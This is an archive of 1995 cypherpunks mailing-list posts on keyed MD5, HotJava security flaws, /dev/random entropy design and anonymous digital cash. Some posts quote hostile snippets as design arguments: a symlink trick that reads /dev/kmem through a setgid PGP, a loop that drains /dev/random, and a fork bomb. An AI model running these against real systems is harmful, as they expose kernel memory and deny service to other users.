cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get
a lot hotter as the government spinmeisters labor to keep us focused on
public enemies while frantically trying to keep its hand in every citizens
pocket and its eyes on every bankbook.

# # #
COPYRIGHT CMP PUBLICATIONS 1995

Bill Frezza is president at Wireless Computing Associates and co-founder of
the online forum DigitaLiberty.  The opinions expresses are his own. Frezza
can be reached at frezza@interramp.com.

 ------------------------------------
| Wireless Computing Associates, Inc.
| 704 Stoney Hill Rd., Suite 155
| Yardley, PA 19067
| ph 215-321-0929, fax 215-321-0490
| urgent Email: frezza@radiomail.net
| bulk Email: frezza@interramp.com
 ------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 04:42:06 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510302351.AA28243@zorch.w3.org>
Message-ID: <199510312331.SAA03949@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 	Do not spec Keyed MD5, it is a complete looser. It is actually weak
> against a number of attacks. There are much better constructs for creating
> a keyed digest. There are much better ways of creating a digest than using
> a hash fuinction as the base.

What??? 

A keyed version of MD5 is the base authentication mechanism in IPSP
and it has been heavily examined by a number of very good
cryptographers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 1 Nov 1995 08:24:14 +0800
To: owner-cypherpunks@toad.com
Subject: Re: Need Mail-to-News gates
Message-ID: <9510312340.AA12914@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Until I can write a script to pull all the newsgroups from the active 
>file and place aliases for them in sendmail, the only way to use it is 

The "gag" program that comes with my news/mail gateway software known
as newsgate can do this automatically.  email to rsalz@nntp.com for
a copy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 1 Nov 1995 08:41:48 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510312348.AA12963@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>GSS is often brought up on occasions like this. I have never seen an architectural
>overview of what it is trying to achieve for me or how. When I am provided 
>with a clear definition of what it is I hope to arrive at a clear explanation 
>of why I'm not using it. Unfortunately the RFC process strips the rationale
>part out of the specs. 

You don't understand it, but once you do you can explain why you're not
using it?  Do you really mean that, or am I misunderstanding?

Many of the GSSAPI principals are in the Boston area:  John Linn at
OpenVision in Cambridge, John Wray at Digital in Littleton, Ted T'so
and Marc Horowitz at MIT, etc.

If you would like to have a discussion, face-to-face or phone, let
me know and I will try to work something out.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 08:31:24 +0800
To: cypherpunks@toad.com
Subject: Please send cash
Message-ID: <9510312359.AA21087@all.net>
MIME-Version: 1.0
Content-Type: text


I just picked this up from the Risks forum:

> Date: Mon, 30 Oct 1995 16:14:59 -0500
> From: Drew Dean <ddean@CS.Princeton.EDU>
> Subject: HotJava 1.0 alpha 3 security issues
> 
> We have found several security problems in the 1.0 alpha 3 release of
> HotJava from Sun Microsystems.  The two most important problems are that
> HotJava does not enforce the stated limits on where an applet can connect to
> (an applet can talk to any place with which you have IP-level connectivity),
> and HotJava is vulnerable to a man-in-the-middle attack, where someone can
> watch your web-surfing, both seeing your requests, and the content that you
> receive.

Two of the Java attacks I outlined in this forum and got abuse for.

> While HotJava prevents applets from actively opening connections that
> violate the user-selected security policy, it allows an applet to accept
> connections from anywhere.  At this point, an applet only has to use any one
> of a number of channels to communicate where it is, and have the remote end
> do the active open.
> 
> HotJava also allows an applet to set the proxy servers that the browser
> uses.  This opens up a huge hole for anyone concerned about the privacy of
> their web surfing.

Attacks 31-49 work here.

> Please note that these bugs are specific to the 1.0 alpha 3 release, and are
> _not_ bugs in the Java language itself, nor do they apply to Netscape 2.0
> beta 1J, which doesn't permit network connections.  We have notified Sun of
> these problems, and are presently writing a paper on these and other issues.
> We will make more information available on our Web page after we hear back
> from Sun.

Drat - Sun doesn't offer awards.

> 
>     http://www.cs.princeton.edu/~ddean/java/
> 
> Drew Dean				Dan Wallach
> ddean@cs.princeton.edu			dwallach@cs.princeton.edu

Inquiring minds want to know.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Karl Marx <karlmarx@illumini.demon.co.uk>
Date: Wed, 1 Nov 1995 04:38:50 +0800
To: cypherpunks@toad.com
Subject: Nautullus Voice Encryption
Message-ID: <9510311908.aa17855@relay-3.mail.demon.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I don't know if any of you have heard of the voice encryption program 
called Nautullus, but the full version was supposedly released 
sometime ago. Can someone please point me to a site where it is 
available ?

Thanks....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 1 Nov 1995 05:48:31 +0800
To: cypherpunks@toad.com
Subject: InfoWar
Message-ID: <199510311811.TAA18276@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Wall Street Journal, October 31, 1995, p. B1.


It's Time You Became A Manager of Change, The Consultants Say
[Excerpts]


Rapid innovation and product introduction require a nimbleness
lacking in many corporate bureaucracies.

"There's an intrinsic need to improve your effectiveness at
managing change -- whatever form it takes," says David Nadler,
chairman of the New York-based Delta Consulting Group.

Change-management boosters are also telling managers to learn
about "knowledge management" as a means of achieving their new
goals.

Knowledge management attempts to make fuller use of internal
information networks. The consulting units of Arthur Andersen,
Ernst & Young and Price Waterhouse are peddling systems to
collect, store and distribute knowledge. Andersen designates
"knowledge managers" who monitor traffic through its Lotus
Notes e-mail software and store valuable information on a CD-
ROM. The disk contains 16,000 pages on everything from
performance measurements to employee motivation.

One problem with the system: "It's so difficult to tie
knowledge-management systems to bottom-line improvement," says
C. Jack Grayson Jr., whose American Productivity and Quality
Center co-sponsored a knowledge-management symposium with
Arthur Andersen. "That just feeds suspicions that it's just
another fad."

It's also difficult to get employees to contribute to the
information pool [fearful their jobs may vanish after overt
knowledge-transfer, hence, the appeal to managers for systems
that covertly siphon knowledge and record grounds for
dismissal].

------

WSJ, October 24, 1995, p. A24.


Privacy Laws Are Lax On New Technology, Federal Agency Says 

Washington -- Inconsistent privacy laws let companies sell
sensitive information about consumers who use new
communications technologies, the Clinton administration
warned.

In a report, the Commerce Department's National
Telecommunications and Information Administration called on
communications companies to tell customers if they plan to
sell information about what they watch or whom they call, and
to make it easy for customers to squelch the disclosure of
sensitive information.

Federal regulations allow people to ask their phone company to
keep information confidential, but the rule generally doesn't
apply to small phone companies or wireless phones, according
to the report. Laws that prevent video stores from disclosing
what movies customers watch don't apply to pay-per-view
services by satellite-television providers. And while a 1986
law prevents on-line computer services from snooping into
electronic mail, it doesn't prevent the services from selling
information about who e-mailed whom, and what the topic was,
the report noted.

The Commerce Department stopped short of calling for
legislation to close the gaps. But "if industry doesn't do it,
consumers will demand that the government do it," predicted
Larry Irving, assistant commerce secretary for communications
and information.

Industry representatives played down the privacy loopholes.
Ronald Plesser, a Washington attorney who represents online
services and direct marketing firms, said, "I know of no
example of anybody trafficking in e-mail descriptions." A
spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
do not release names of customers that ordered movies.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 1 Nov 1995 02:48:07 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510311715.TAA05821@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    How about SetGID? We were going for 660 root.kmem.
> 
> Bad idea; anyone who can run PGP could then get instant access to kmem

Fooey. Of course. Scratch that plan.

> 	cd /tmp
> 	ln -s /dev/kmem foo
> 	pgp -e tytso foo
> 	rm foo
> 	pgp foo.pgp

Eeeeek!

>    ? "Gut feel" suggests to me that large ammounts of "predicted" input might
>    be worse than the normal sort of system noise you have been using.
> 
> But keep in mind that what we're doing is XOR'ing the input data into
> the pool.  (Actually, it's a bit more complicated than that.  The input
> is XOR'ed in with a CRC-like function, generated by taking an
> irreducible polynomial in GF(2**128).  But for the purposes of this
> argument, you can think of it as XOR.)  So since you don't know what the
> input state of the pool is, you won't know what the output state of the
> pool.

I chatted with a colleague at work, and he helped bend my mind right.
I had the mistaken notion that adding lots of data would "overflow"
and "dilute" the entropy to an attackable state.

>    Is this millisecond accuracy quantifiable in terms of bits of entropy?
>    if so, the ethernet is surely safe?
> 
> Well, no.  If you're only using as your timing the 100Hz clock, the
> adversary will have a better timebase than you do.  So you may be adding
> zero or even no bits of entropy which can't be deduced by the adversary.

In a 386 or a 486 (under FreeBSD at least) there is a 1Mhz clock available.
How would _this_ be? On the Pentium there is the <whatsit?> register
which will give the board's oscillator (or 90 MHz) I believe.

> This is even worse in the PGP keyboard timing case, since the adversary
> almost certainly can find a better time resolution to measure your
> incoming packets when compared to the timing resolution that most
> programs have.  Far too many Unix systems only make a 100Hz clock
> available to the user mode, even if you have a better quality high
> resolution timing device in the kernel (for example, the Pentium cycle
> counting register).

Ah yes - _that_ register. :-)

What then is a body to do? Preserve all _verifiable_ randomness like gold?
Dish it out under some quota? A denial of service attack would be

forever {
	cat /dev/random > /dev/null
}

Severely limiting most decent folk's chance at getting PGP to work.

Right now I am considering making a piece of cheap hardware to deliver
noise to a digital input. (Electronics is a stagnant hobby of mine)
Interested? I may knock up a prototype in a month or so...

> The problem is that in order to do this requires making assumptions
> about what the capabilities of your adversary are.  Not only does this
> change over time, but certain adversaries (like the NSA) make it their
> business to conceal their capabilities, for precisely this reason.

Can they predict thermal noise in a cheap transistor? ]:->

> So I like to be conservative and use limits which are imposed by the
> laws of physics, as opposed to the current level of technology.  Hence,
> if the packet arrival time can be observed by an outsider, you are at
> real risk in using the network interrupts as a source of entropy.
> Perhaps it requires buidling a very complicated model of how your Unix
> scheduler works, and how much time it takes to process network packets,
> etc.  ---- but I have to assume that an adversary can very precisely
> model that, if they were to work hard enough at it.

This is a strong argument for some form of specialised noise source.
I have read of methods of getting this from turbulent air flow in a hard
drive (an RFC, I believe).

> People may disagree as to whether or not this is possible, but it's not
> prevented by the laws of physics; merely by how much effort someone
> might need to put in to be able to model a particular operating system's
> networking code.  In any case, that's why I don't like depending on
> network interrupts.  Your paranoia level may vary.

If I was running Fort Knox, I'd probably use Radioactive decay...

(From my experience working at a cyclotron facility - these SOB's are
_*RANDOM*_)

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Wed, 1 Nov 1995 06:59:10 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311715.TAA05821@grumble.grondar.za>
Message-ID: <47661e$6li@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510311715.TAA05821@grumble.grondar.za>,
Mark Murray <mark@grondar.za> wrote:
> forever {
> 	cat /dev/random > /dev/null
> }
> 
> Severely limiting most decent folk's chance at getting PGP to work.

Ideally, if two processes are trying to read /dev/random at the same time,
both would get data at half-speed.  Doesn't it work that way already?
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Wed, 1 Nov 1995 07:13:35 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510311855.AA00379@zorch.w3.org>
Message-ID: <199510312230.OAA15622@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995 13:55:34 -0500, you wrote:


> MD5 is pretty well entrenched in IETF circles

Agreed, but that doesn't make it appropriate here.

> and since RSAREF only
> provides Md2, MD4 and MD5 there has to be an option to use at least 
> one of them.

Why?  Is there some REAL requirement that HTTP-NG be implementable
using only RSAREF for crypto?

> MD5 is the best of that set IMHO.

No argument -- but it's still too short for most hash applications.
I'd much rather see hashes that everyone agrees are more than long
enough for the forseeable future  -- and I don't think you'll find
that consensus for MD5.

Of course, whether a particular hash is as secure as it can be for a
given length is a separate question.

  <references snipped>

Thanks for the pointers. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 1 Nov 1995 07:12:33 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510312115.XAA06361@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>  In a 386 or a 486 (under FreeBSD at least) there is a 1Mhz clock available.
>  How would _this_ be? On the Pentium there is the <whatsit?> register
>  which will give the board's oscillator (or 90 MHz) I believe.
> 
> What's HZ set at for FreeBSD?  Most of the x86 Unixes have generally
> used HZ set at 100, because the interrupt overhead on a x86 isn't cheap,
> and so you want to limit the number of clock interrupts.

There are two interrupts 100Hz and the other 128Hz (The second gets pushed
into the +-1K region during profiling.

> You can sample the timing clock, but it turns out to be rather expensive
> to do so; several I/O instructions, which will require several delays if
> they have to go through your 8 MHz ISA bus.  We've moved away from using
> the hardware clock on the 386 because of the overhead concerns.  On the
> Penitum, we use the clock cycle counter.

Drat. Methinks I need to follow suit, but I value that 1Mhz...

> Well, verifiable randomness really is like gold.  It's a valuable
> resource.  On a time-sharing system, where you really want to equitably
> share *all* system resources perhaps there should be a quota system
> limiting the rate from which a user is allowed to "consume" randomness.

True. VMS could probably do this. <Ducks bricks>

> On the other hand, most Unix systems *aren't* great at doing this sort
> of resource allocation, and there are enough other ways of launching
> denial of service attacks.  "while (1) fork();" will generally bring
> most systems to their knees, even in spite of limitations of the number
> of processes per user.  Most Unix systems don't protect against one user
> grabbing all available virtual memory.  And so on....

Getting there (I think).

> There's nothing special about /dev/random in this sense; it's just
> another system resource which can be abused by a malicious user, just
> like virtual memory or process table slots.

True. Good policing never hurt.

>    This is a strong argument for some form of specialised noise source.
>    I have read of methods of getting this from turbulent air flow in a hard
>    drive (an RFC, I believe).
> 
> Yes, ultimately what you need is a good hardware number generator.
> There are many good choices; from radioactive decay, noise diodes, etc.

The idea that I like the most so far is to generate noise, but filter
it through an LPF to get frequencies less than (say) 500Khz. Put that
through schmitt trigger to get decent squarewaves and then into an
N-bit hardware shift register with some XOR feedbacks to mix this.
Voila! Nice numbers on demand. Shouldn't cost more than a few <shekels>...

> Short of good hardware sources, the other really good choice is
> unobservable inputs.  Hence, the Linux driver is hooked into the
> keyboard driver, and the various busmice drivers.  Those are really
> wonderful sources of randomness, since they're generally not observable
> by an adversary, and humans tend to be inherently random.  :-)

Doesn't work on servers in locked rooms... :-(
With those, as long as the machines are secure, (ie plebs cannot watch
and time raw packets) the network card is OK. The server may not be on
transit ethernet AT ALL.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Nov 1995 02:41:07 +0800
To: cypherpunks@toad.com
Subject: DIR_ty$
Message-ID: <199510301238.HAA06263@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


10-30-95.  In slave to Orlin Crabbe's "The Money Laundromat," 
The NYPaper has a Page One lead story:


"Cali Drug Cartel Using U.S. Business to Launder Cash. 105 
Firms Suspected. Trade Related Schemes Said to Have Moved $3 
Billion Through Companies."


DIR_ty$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 2 Nov 1995 09:29:16 +0800
To: "Tom Bell" <BELL@odo.law.udayton.edu>
Subject: Re: S. 1284 To Amend (C) Act
Message-ID: <9510302258.AA00471@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  S. 1284,  s1201:  "No person shall import, manufacture or distribute
>  any device, product, or component incorporated into a device or
>  product, or offer or perform any service, the primary purpose or
>  effect of which is to avoid, bypass, remove, deactivate, or otherwise
>  circumvent, without the authority of the copyright owner or the
>  law, any process, treatement, mechanism or system which prevents
>  or inhibits the violation of any of the exclusive rights of the
>  copyright owner under section 106."

IANAL, but I thought these types of laws were already tested and deemed  
unconstitutional in cases involving video-tape copying boxes, dual video  
cassette dubbing decks, SCMS 'scrubbers', etc...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 2 Nov 1995 09:28:57 +0800
To: Simon Spero <cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
Message-ID: <9510302351.AA28243@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Simon,

	Do not spec Keyed MD5, it is a complete looser. It is actually weak
against a number of attacks. There are much better constructs for creating
a keyed digest. There are much better ways of creating a digest than using
a hash fuinction as the base.

	There is some work by Phil Rogaway on making keyed digest functions
which I strongly recommend people look at. I can post a paper on the subject if 
people are interested.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 1 Nov 1995 11:07:02 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash on Scientific American
In-Reply-To: <Pine.SUN.3.90.951031015937.2277C-100000@dfw.net>
Message-ID: <Pine.LNX.3.91.951031091650.2874A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Aleph One wrote:

> Another thing before I go to bed. On the November issue of Scientific 
> American the Essay column writen by Anne Eisenberg is titled "Doing 
> Busioness on the Net". Its short (one page), but metions PK crypto, 
> touches upon the dangers that online transcations pose to privacy, and 
> talks a bit about ecash. Sadly there is no mention of ITAR *sight*

I was impressed with the slant of this essay.  I remember another article
on different forms of digital cash in Popular Science where the author mentions
ecash and the only thing said about it was that it could aid drug-traffickers.
I was glad to see the article in Scientific American that gives the positive
side of ecash.  It did seem from some of the responces to the Popular Science
article that most people disagreed with the author's point of view on 
anonymous digital cash. 

`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 1 Nov 1995 13:01:11 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Important Digital Cash Question...
In-Reply-To: <v02120d06acbab250b4e9@[199.0.65.105]>
Message-ID: <199510310237.NAA00348@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

rah@shipwright.com (Robert Hettinga) writes:
...
> Wait, wait! I have another one. I call digital cash bankers "underwriters",
...
> So, we need a "U" name...


David HM Spector <spector@zeitgeist.com> replies:
...
> um... perhaps, Ursula the Underwriter...?
...

How about Uhura?

(Or should Uhura be Mitch, 'cause she can monitor your conversations?)

(Mitch or Witch - Woman In The CHannel?)


OK, forget it.


How about Sam the banker (Sam as in Samuel Clemens)?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMJWL2CxV6mvvBgf5AQGbPAP/Z4wMAPokthvWygKdLEZ0vTAFTDti4sUp
4R57GrY5ZHwyJwM2bI/Xgvb30sJnVXzmHkahOouFD/6RrnW4kydouhaNFuI4Eev/
FdPxLaKz2j37U8fnC5Jo3zyRT+PZLqba6lwlcAESNNUgfEsIkM2cn3Rw72p4dnrc
Iqs5Wmo5exk=
=3MRB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@cthulhu.engr.sgi.com>
Date: Wed, 1 Nov 1995 10:02:57 +0800
To: perry@piermont.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199511010026.TAA22659@jekyll.piermont.com>
Message-ID: <3096CA5A.41C6@engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Tom Weinstein writes:
> > One problem with this scheme is that if multiple processes have
> > /dev/random open you can block unexpectedly.  If I try to avoid
> > blocking by first checking if entropy is available there's a race
> > condition if another process reads from the device.  Is there
> > another way to avoid blocking?
> 
> Yeah. Use non-blocking I/O. Its in every version of Unix I've touched
> for over a decade.

I guess I wasn't clear.  The message I was replying to defined how
the driver decided whether to block.  Since I don't have the source
code, I was wondering whether non-blocking I/O worked for this driver.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 10:03:15 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510311650.AA32634@zorch.w3.org>
Message-ID: <Pine.SOL.3.91.951031170143.1256A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


[Short response, because I'm at home. More details tommorow ]

On Tue, 31 Oct 1995 hallam@w3.org wrote:

> 
> >How are you going to handle mechanism negotiation?
> This is a must do item, Simon is haviung to do >lots< of this.

Just to clarify: one of the most important parts of the design is the 
negotation mechanism, so a lot of effort has gone into these mechanisms. 
The aim is to _not_ have to do lots of RTT negotations through the use of 
caching and dynamic profiling. The negotation facilities in HTTP 1.0 are not 
used, not because there isn't a need for them, but because they don't 
offer sufficient power, and are much too inefficient. 

Oh, and when I say dynamic profiling, I'm referring to semi-standard 
profiles that can be obtained over the network, not to OSI style 
dead-trees. Deriving negotiated feature sets from a profile works really 
well for applications like the WEB, as a vast amount of this information 
remains the same for all copies of a particular version of a Browser. For 
example, all copies of hotjava support html 1.0, some netscape 
extensions, and can handle inline gifs, but not inline jpegs; alpha 
hotjava supports the alpha applet API. 

Simon
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 Nov 1995 10:13:28 +0800
To: "Martin Diehl" <mdiehl@dttus.com>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199511010149.RAA04458@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 17:19 10/31/95 -0600, Martin Diehl wrote:
>     2. When doing time domain measurements (Hewlett Packard had some good 
>     application notes on this subject), you must consider base clock 
>     jitter.  Ill try to illustrate with a diagram:
>     
>     actual event:            V                    V
>     clock granularity:  /...../...../...../...../...../...../
>     
>     the problem is that no matter how small the basic clock unit is 
>     (symbolized by "/", above), you can't be sure how much of that unit 
>     has passed when the event (symbolized by "V", above) occurs.  For 
>     example, on the original IBM PC, clock interrupts occurred about 18.2 
>     times per second (55ms interval).  In that architecture, you can't 
>     time an event and have an uncertainty of less than 2 times 55ms

Ah, but there is a neat hack that works well if you can dedicate the whole
processor to doing the timing.  This works with systems that do not have
preemptive multi-tasking.  (Getting it to work with preemptive
multi-tasking is a harder excersize).  Credit where credit is due, I first
saw this technique used, probably in 1968, on the IBM/360 (60HZ clock) with
a pair of programs called PACER and RATER.

Monitor the clock location.  (It doesn't matter whether it is incrmented by
hardware or software.)  Run a timing loop from when it changes until it
changes again and count the number of times through the loop.  Then use the
same timing loop and count how many times the loop runs from a clock tick
to the event of interest (or from the event of interest to the next clock
tick).  Use the ratio of the two counts to interprolate between the times
you can get from the clock.

You have used the processor's instruction rate to synthesize a better clock.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 6 Nov 1995 19:12:24 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ecash remailer
Message-ID: <199511010018.SAA06259@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>Hal writes:
>[suggesting a problem with Ed the Currency Cleaner]
>> What about this, though: Alice did not mean to pay Bob, but rather
>> Charlie, and Bob stole the coins.  He launders them through Ed's
>> service.  Charlie never got the cash, and Alice complains to the bank
>> that the coins were stolen.  The bank says, fine, we can identify the
>> perpetrator, let's see... it's Ed.  Ed is now charged with theft and
>> has an expensive and uncertain legal experience ahead of him.
>
>Jumping in hastily:
>
>It seems to me that Ed faces a larger problem if the above scenario turns
>out to be a viable attack. Consider the following sequence: Alice and
>Charlie decide to get some (payee-anonymous) currency laundromat in hot 
>water. Alice (payer-anonymously) washes some coins at the laundromat.
>Con-man Charlie claims he didn't get paid for some fictional transaction with
>Alice. Alice complains to the bank, and the rest proceeds as before. The
>Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
>situation from the bank's perspective.
>

Wouldn't the ability to have the bank prove that the coins were 'cashed'
make this all null and void? The only way this would work would be if
Charlie is willing to completely forego cashing in the coins, *ever*. Should
he cash them in later, Ed would seem to have grounds for suspicion/complain.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 2 Nov 1995 18:47:33 +0800
To: cypherpunks@toad.com
Subject: PRL_har
Message-ID: <199510312321.SAA05260@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Ito has shared an LA Times report of October 21 on frantic
   Japanese economic espionage, there and in the US, and its
   booming bugging and wiretapping industry.

   And The Wash Post simpers today about the CIA-Mils self-
   sucking into the eco-spy quagmire to garner funds, as spit
   in its toon yesterday.

   More non-crypto: FinTimes jabbers today in "Cars safe from
   phone threat," on the weird effects on automobile
   "electronic-based safety-critical systems" of pervasive
   sources of electro-magnetic interference, say by your
   mobile phone or police transceivers, that may catapult
   the family-fun Land Rover into Rancid's roadbus.


   PRL_har  (3 all 15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 1 Nov 1995 10:10:09 +0800
To: cypherpunks@toad.com
Subject: There is still no perfectly anonymous currency
Message-ID: <199511010127.SAA22368@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

It occurs to me that even in an on-line-cleared system, that a 
collusion of Ursula the Underwriter and Bob the Payer can identify 
Alice the Payee by traffic analysis based on time contraints.  Alice 
has to turn in the coin that Bob gave her in order to get it on-line-
cleared *before* she can close the deal with Bob assuming that she 
believes there is a chance Bob's coin is bad (pre-spent).  So Bob 
and Ursula can do some simple traffic-analysis-style coin-watching 
over the course of several transactions between Bob and Alice.


This could become infeasible for Bob and Ursula in the case that
there are very many such transactions going on at the same time and
Alice (and some of the other payees) prudently add a traffic-analysis-
foiling delay between acceptance of Bob's coin and turning it over 
to the bank, and between receiving confirmation from the bank and 
letting Bob know that the bank said "OK".  (Of course all this, and 
in fact all conversations on this subject, presume the existence and 
proper usage of identity-protecting communication protocols between 
Alice and Ursula and between Alice and Bob.)


Now in some applications it might be a problem for Alice to add
these delays.  (She might need to complete a great many transactions
in a limited amount of time.)  In this case Alice will have to
choose between efficiency and identity-protection.  Her tactic will
further be hampered by the fact that only Ursula knows how many
similar transactions are going on at any given time.  Alice will
have to guess.


In sum, I have still not seen a proposal for an electronic currency
scheme which ensures unconditional identity-protection for both payer 
and payee.  On the other hand, if a bank allows pseudonymous accounts,
or if coin-re-paying systems can be implemented, then some lesser 
degree of identity-protection is still attainable.  On the third 
hand, if a bank allows instant, cheap, anonymous accounts or, 
equivalently, if the bank issues coins in return (or as Tony Eng has
suggested, issues "deposit-vouchers" in return) instead of accessing
the payee's account, then ensuring unconditional identity-protection 
for both parties is easy under several protocols, including the 
Chaumian Ecash protocol.  
(That is:  auto-coin-laundering via an instant, one-use anonymous 
account that you control or via a new coin or a deposit voucher
